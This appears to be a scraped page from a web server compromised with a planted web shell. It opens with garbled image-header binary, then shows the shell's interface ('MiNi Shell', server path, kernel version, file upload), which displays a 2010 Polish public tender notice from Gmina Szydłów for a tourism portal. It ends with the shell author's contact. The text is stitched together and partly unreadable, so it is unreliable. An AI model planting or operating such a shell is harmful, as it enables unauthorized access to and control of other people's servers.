JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100609/147473-N-2010.html

<p class="kh_header"><b>Szydłów: Wykonanie portalu turystycznego Szydłów - polskie Carcassonne</b><br>
<b>Numer ogłoszenia: 147473 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szydłów , ul. Rynek 2, 28-225 Szydłów, woj. świętokrzyskie, tel. 041 3545125, faks 041 3545125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szydlow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie portalu turystycznego Szydłów - polskie Carcassonne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zaprojektowanie i wykonanie internetowego portalu turystycznego Szydłów - polskie Carcassonne, w trzech wersjach językowych: polskiej, angielskiej i niemieckiej.

1)	Szata graficzna strony

Szata graficzna strony winna nawiązywać do zabytkowego, średniowiecznego charakteru Szydłowa. Ponadto powinna być przejrzysta i niezbyt przeładowana grafiką. Elementy graficzne powinny być raczej statyczne. Dopuszcza się realizację banera nagłówkowego w formie zmieniających się zdjęć.

2)	Założenia systemu CMS

1.	System poruszania się po stronie winien być intuicyjny, ułatwiający szybkie dotarcie do informacji na wybrany temat - dotarcie do każdej informacji powinno zająć nie więcej niż cztery kliknięcia,
2.	Serwis powinien być wielojęzyczny - każda informacja w bazie danych i każdy element strony powinien posiadać swoje wersje językowe: polską, angielską i niemiecką,
3.	System grup - użytkowników z możliwością definiowania ról i uprawnień do funkcji i modułów,
4.	Mechanizm logowania - treści i funkcje dostępne tylko dla osób zarejestrowanych w serwisie - np. wprowadzanie nowych treści do serwisu, przeprowadzanie ankiet itd.
5.	Edytor treści typu WYSIWYG z menadżerem plików i grafik umożliwiający zarządzanie treścią bez znajomości podstaw języków opisowych,
6.	Tworzenie dynamicznie drzewiastej struktury serwisu z dowolną ilością zagłębień,
7.	Możliwość zdefiniowania cyklu życia dokumentu określonego typu poprzez wprowadzenie ram czasowych publikacji, po którym zostanie ona skasowana bądź umieszczona w archiwum,
8.	Możliwość komentowania poszczególnych treści serwisu z zabezpieczeniem antyspamowym,
9.	Możliwość nadawania kategorii poszczególnym wpisom (tagi),
10.	Biblioteka obrazów i fotografii możliwych do wykorzystania przez wszystkich użytkowników CMS z możliwością wzbogacania jej przez wszystkie poziomy administracyjne i katalogowania,
11.	Wyszukiwarka wewnętrzna serwisu,
12.	Galeria zdjęć z cechami Web 2.0,
13.	Wysyłanie pocztówek elektronicznych,
14.	Newsletter - tworzenie i mechanizmy subskrypcji,
15.	Obsługa kanałów RSS,
16.	Moduł sond i ankiet,
17.	Optymalizacja pod kątem pozycjonowania serwisu (m.in. przyjazne adresy),
18.	Opcja wydruku poszczególnych treści (bez zbędnych nagłówków, menu itd.),
19.	Opcja eksportu treści do formatu pdf,
20.	Opcja -Powiadom znajomego - wysłanie nagłówka treści pod wskazany adres e-mail
21.	Szczegółowe statystyki odwiedzin strony (mogą być oparte np. o usługę Google Analytics),
22.	Moduł umożliwiający zagnieżdżanie filmów z portalu YouTube,
23.	Moduł umożliwiający zagnieżdżanie map z Google Maps.

3)	Menu tematyczne
	
Menu tematyczne powinno zawierać następujące kategorie:

1.	Aktualności
2.	Zabytki
3.	Historia
4.	Przyroda
5.	Imprezy
6.	Gastronomia
7.	Noclegi

Administrator winien mieć możliwość dodawania nowych pozycji w menu i zmiany istniejących.

4)	Filmiki promocyjne

Wykonawca powinien zrealizować trzy filmiki promocyjne prezentujące turystyczne walory Szydłowa. Każdy film powinien być nie krótszy niż trzy minuty.

Film 1: Szydłów - polskie Carcassonne powinien prezentować wszystkie najważniejsze zabytki Szydłowa - mury obronne, Bramę Krakowską, zamek, kościół św. Władysława, kościół Wszystkich Świętych, synagogę, skarbczyk. 

Film 2: Szydłów - śliwkowa stolica Polski powinien prezentować Szydłów, jako zagłębie śliwkowe. 

Film 3: Szydłów - miejsce imprez powinien prezentować Szydłów, jako miasteczko w którym odbywa się mnóstwo imprez plenerowych i kulturalnych: Święto Śliwki, Dni Szydłowa, Turniej Rycerski o Miecz Króla Kazimierza Wielkiego, Spotkania z Kulturą Żydowską, Plenery Malarskie, Międzynarodowy Plener Rzeźbiarski, Międzynarodowe Uliczne Biegi Sylwestrowe.

Filmy powinny zostać zrealizowane w formacie DVD oraz w formacie umożliwiającym ich publikację w internecie. Dopuszcza się realizację filmów w postaci pokazu slajdów z materiałów dostarczonych przez Zamawiającego.

Filmy należy umieścić na portalu YouTube (na koncie uprzednio uzgodnionym z Zamawiającym) i zagnieździć na portalu turystycznym.

W każdym filmie powinno być zawarte logo Program Regionalny Narodowa Strategia Spójności, herb Województwa Świętokrzyskiego oraz flaga Unii Europejskiej oraz hasło Szydłów - polskie Carcassonne - kampania promocyjna.

5)	Moduł banerowy

System banerowy powinien posiadać mechanizmy:
1.	umożliwiający samodzielne zarządzanie publikowanymi w portalu banerami informacyjnymi oraz kontrolowaną publikację wg ustalonych przez administratora kryteriów,
2.	możliwość ustalenia ram czasowych wyświetlania banera,
3.	możliwość ustalenia godziny wyświetlania banera.

6)	Moduł ankietowy

System ankiet powinien posiadać mechanizmy:
1.	umożliwiające samodzielne publikowanie ankiet i pozyskiwanie opinii internautów,
2.	samodzielnego wprowadzania przez administratora za pomocą formularza zapytania ankietowego, oraz definiowania proponowanych odpowiedzi,
3.	możliwość prezentacji ankiety w wybranym miejscu systemu w ustalonym okresie,
4.	możliwość zapoznania się przez internautę z procentowymi wynikami odpowiedzi innych użytkowników,
5.	dwupoziomowe zabezpieczenie uniemożliwiające wielokrotne oddawanie głosów poprzez sprawdzanie numeru IP i za pomocą mechanizmu cookies,
6.	umożliwiające administratorowi dostęp do liczbowych wyników na zadawane pytania,
7.	umożliwiające usuwanie i przenoszenie ankiet do archiwum.

7)	Kalendarz wydarzeń

Moduł powinien umożliwiać umieszczenie na stronie internetowej kalendarza, który po kliknięciu wybranego dnia miesiąca prezentować będzie wszystkie wydarzenia kulturalne odbywające się w tym dniu. Baza powinna umożliwiać także przeszukiwanie wg dowolnej kombinacji wyznaczonych kryteriów, np.: wybrana data, okres czasu (od do), rodzaj wydarzenia (np.: kulturalna, wystawa, koncert, plenerowa, sportowa),

Administrator powinien mieć możliwość wprowadzania informacji o wydarzeniach w ustalonym zakresie, jak np.: miejsce, rodzaj imprezy (z możliwością wyboru, lista edytowalna przez administratora), organizator, adres imprezy, telefon, e-mail, strona www, data rozpoczęcia, data zakończenia, opis, zdjęcia.

8)	Hosting

Wykonawca zobowiązany jest udostępnić platformę internetową, na której będzie utrzymywana strona z minimalnym transferem miesięcznym 10 GB oraz przestrzenią dyskową minimum 2 GB z możliwością powiększenia tych parametrów. Platforma internetowa powinna udostępniać wszelkie usługi internetowe niezbędne do utrzymania i poprawnego funkcjonowania strony internetowej przez okres 5 lat.

9)	Dokumentacja

Wykonawca zobowiązuje się dostarczyć papierową dokumentację systemu zawierającą opis używanych w systemie modułów, sposoby interakcji między nimi i instrukcję obsługi systemu od strony administratora..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali, co najmniej jedno zamówienie polegające na opracowaniu portalu internetowego o wartości min 20 000,00 PLN brutto,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty wg załącznika 1 SIWZ,
2)	Pełnomocnictwo, określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik,
3)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia,
4)	Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, składa wraz z ofertą pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - ewentualnie do wykorzystania wzór oświadczenia o oddaniu do dyspozycji zasobów - zał. Nr 4,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące warunki zmiany umowy:
a)	w przypadku zmiany w przepisach prawa lub wykładni jego przepisów,
b)	w przypadku zajścia okoliczności (zdarzeń), na które strony nie miały wpływu, a dotyczyły działania lub zaniechania osób trzecich lub organów administracji,
c)	zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba, że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany, 
w stosunku do okoliczności towarzyszących zawarciu umowy, i czyniących niemożliwym spełnienie świadczeń stron umowy, w sposób określony pierwotnie w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szydlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szydłów, ul Rynek 2, 28-225 Szydłów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Urząd Gminy Szydłów, ul Rynek 2, 28-225 Szydłów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com